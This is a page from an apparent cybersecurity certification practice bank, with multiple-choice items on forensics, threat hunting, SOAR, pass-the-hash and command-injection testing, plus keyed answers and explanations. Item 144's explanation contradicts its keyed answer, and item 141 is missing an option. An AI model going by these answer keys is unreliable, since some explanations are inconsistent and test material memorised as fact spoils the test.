E.Contents of RAM (memory dump)
AnswersC, D, E

Network state can change quickly.

Why this answer

The order of volatility dictates that the most volatile data (registers, cache, memory, network connections, running processes) should be collected first. Disk data is less volatile.

138
MCQeasy

During a threat hunting exercise, a security analyst hypothesizes that adversaries may be using PowerShell to execute commands in memory. Which threat hunting methodology is being employed?

A.Signature-based hunting
B.TTP-driven hunting
C.Hypothesis-driven hunting
D.IoC-driven hunting
AnswerC

The analyst is starting with a hypothesis about PowerShell usage, which is hypothesis-driven.

Why this answer

Hypothesis-driven hunting starts with a hypothesis about potential adversary behavior, then searches for evidence. IoC-driven uses indicators of compromise, and TTP-driven focuses on tactics, techniques, and procedures.

139
MCQeasy

A security analyst is reviewing a suspicious file. Which static analysis technique would the analyst use to examine the file without executing it?

A.Submit the file to VirusTotal
B.Execute the file in a debugger
C.Run the file in a sandbox
D.Use strings to extract readable text
AnswerD

Strings is a common static analysis tool.

Why this answer

Static analysis examines the file without running it. Running strings extracts readable text, which can reveal clues like IP addresses or commands.

140
MCQmedium

A security operations center (SOC) is implementing a SOAR platform to automate responses to phishing incidents. The playbook will include steps to automatically quarantine suspicious emails, delete them from user mailboxes, and block the sender's domain. Which element should the SOAR playbook incorporate to ensure the automated response does not cause unintended disruption?

A.An automatic rollback script that restores quarantined emails after 24 hours if no user complaint
B.Integration with threat intelligence to verify the sender domain reputation score before blocking
C.A confirmation step that prompts the analyst to approve the quarantine and deletion actions
D.A manual approval step before executing any automated response
AnswerC

Having the analyst approve destructive actions like deletion reduces the risk of removing legitimate emails.

Why this answer

Automated actions can have negative consequences if not validated. Incorporating user confirmation before destructive actions reduces risk, especially in cases of false positives.

141
Multi-Selectmedium

A security operations team is implementing deception technology to detect lateral movement. Which TWO of the following are examples of deception technologies? (Select TWO.)

Select 2 answers
A.Honeytoken
C.Endpoint detection and response (EDR)
D.Security information and event management (SIEM)
E.Honeypot
AnswersA, E

Honeytokens are deceptive tokens like fake credentials.

Why this answer

Honeypots are decoy systems, and honeytokens are fake credentials or data used to trigger alerts when accessed.

142
MCQhard

During a penetration test, the tester successfully gains initial access to a web server and wants to move laterally to a database server. The web server uses a service account that has local admin rights on the database server. What is the most effective technique for lateral movement in this scenario?

A.Exploit a SQL injection vulnerability in the database server
B.Brute-force the database server administrator password
C.Use a keylogger to capture credentials on the web server
D.Pass-the-Hash
AnswerD

The service account's hash can be used to authenticate to the database server.

Why this answer

Pass-the-Hash uses NTLM hashes to authenticate without the plaintext password, effective when the same account hash is reused across systems.

143
MCQmedium

During an incident response engagement, the security team identifies that a compromised host has been communicating with multiple external IP addresses using encrypted channels. The team needs to determine which processes initiated the connections. Which type of evidence collection should be performed first to preserve the most volatile data?

A.Export the Windows event logs related to network activity
B.Execute a network scan from the compromised host to identify active connections
C.Capture a full disk image using FTK Imager
D.Perform a memory capture using a tool like DumpIt or winpmem
AnswerD

Memory capture preserves the most volatile data, including running processes and network connections, which is critical for identifying malicious processes.

Why this answer

In digital forensics, the order of volatility dictates that volatile data (e.g., running processes, network connections) should be collected first because it is lost when the system is powered down. Memory capture preserves this data, including process information and active network connections.

144
MCQhard

A security engineer is configuring a SIEM correlation rule to detect a potential data exfiltration attempt. The rule should trigger when a single internal host sends more than 10 MB of data to an external IP address that has never been communicated with before, within a 5-minute window. Additionally, the external IP should not be on any whitelist. Which correlation logic best implements this detection?

A.Alert when a host sends >10 MB to an external IP that is not in the whitelist and not seen in the last 24 hours, aggregated over 5 minutes.
B.Alert when a host sends >10 MB to an external IP not in the whitelist and the destination port is 443.
C.Alert when any host sends >10 MB to an external IP not in the whitelist within 5 minutes.
D.Alert when a host sends >10 MB to any external IP aggregated over 5 minutes, then filter out whitelisted IPs.
AnswerA

Correctly aggregates volume and checks for new destination and whitelist.

Why this answer

The rule must aggregate data transfer from a single source IP to a single destination IP over 5 minutes, check the volume exceeds 10 MB, and verify the destination IP is new (unseen in previous 24 hours) and not whitelisted. Option B correctly uses aggregation and lookups.

145
MCQhard

During a threat hunting exercise, a hunter uses the MITRE ATT&CK framework to identify a series of behaviors: an attacker used PowerShell to download a payload, then created a scheduled task for persistence, and finally performed credential dumping via LSASS. Which ATT&CK tactic is associated with the credential dumping technique?

A.Defense Evasion
B.Credential Access
C.Execution
D.Persistence
AnswerB

Credential Access is the tactic for stealing credentials, such as dumping LSASS.

Why this answer

Credential dumping, specifically from LSASS, is a technique under the Credential Access tactic in the MITRE ATT&CK framework. The tactic describes the adversary's goal of stealing credentials.

146
Multi-Selectmedium

A penetration tester is conducting a test against a web application. The client has defined rules of engagement that prohibit any denial of service attacks. The tester discovers an endpoint that is vulnerable to command injection. Which THREE of the following actions should the tester take to validate the vulnerability while staying within scope? (Choose THREE.)

Select 3 answers
A.Use the echo command to write a file on the server
B.Run a whoami command to confirm the user context
C.Delete a random system file to observe impact
D.Flood the endpoint with multiple requests to test resilience
E.Execute a ping command to a controlled server to verify code execution
AnswersA, B, E

Writing a harmless file can prove execution without damage.

Why this answer

To validate command injection without causing damage, the tester should use non-destructive commands like ping, echo, and whoami. Deleting files or performing DoS would violate rules of engagement.

147
Multi-Selecthard

An incident response team is handling a ransomware incident. The team has successfully contained the threat and is now in the eradication phase. Which THREE actions are appropriate for the eradication phase? (Select THREE.)

Select 3 answers
A.Restore systems from clean backups
B.Apply security patches to the vulnerability that allowed initial access
C.Revoke and reset all compromised user and service accounts
D.Delete all infected files and registry keys associated with the ransomware
E.Conduct a lessons learned meeting
AnswersB, C, D

Patching prevents re-infection.

Why this answer

Eradication involves removing the threat completely: deleting malware, revoking compromised credentials, and patching vulnerabilities.

← PreviousPage 2 of 2 · 147 questions total

Ready to test yourself?

Try a timed practice session using only Casp Security Operations questions.